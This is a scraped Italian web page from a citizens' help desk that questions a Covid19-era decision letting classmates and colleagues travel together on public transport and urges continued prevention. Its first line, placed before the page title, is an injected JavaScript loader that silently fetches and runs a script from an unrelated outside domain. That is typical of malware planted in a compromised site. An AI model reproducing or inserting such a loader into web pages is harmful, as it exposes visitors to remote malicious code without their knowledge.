;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Trasporti pubblici e Covid19: situazione in divenire - Sportello Amico Del Cittadino
Covid19 e trasporti: non abbassiamo la guardia
Covid19 e trasporti: non abbassiamo la guardia

Trasporti pubblici e Covid19: situazione in divenire

📣 Il Ministro delle Infrastrutture e dei Trasporti, Paola De Micheli, ha annunciato che è stato ampliato il concetto di congiunto, estendendolo a compagni di classe e colleghi di lavoro. Nelle intenzioni, questo dovrebbe consentire di poter viaggiare insieme senza problemi negli stessi mezzi e in modo ravvicinato, più persone, che dovrebbero già conoscersi e quindi “autotracciarsi".

🧐 Siamo perplessi: non vogliamo dare giudizi, ma non è la soluzione al problema sanitario in corso relativo all’emergenza Covid19. La prevenzione e il distanziamento è ancora necessario, al fine di evitare nuovi contagi. La strategia dei mezzi pubblici va improntata meglio, pensando a mezzi capienti, frequenti e adeguatamente sanificati. Non giochi di parole da bassa burocrazia.

👉 Sportello Amico del Cittadino in questi mesi si è battuto per diffondere la cultura della prevenzione e non intende mollare ora.

Se hai delle domande:

🖥 info@sportello-amico.it

📞 +39 0331 262045

Cerca anche

CORSI DI LAUREA

Essere audaci, ambiziosi, combattivi nel lavoro migliorando le proprie prospettive occupazionali è possibile.I Corsi di …

Dona il tuo 5x1000 ad Salesiani per il sociale
Scrivimi
Come posso aiutarti?
Buongiorno! 👋
i nostri uffici sono a vostra disposizione, chatta con noi !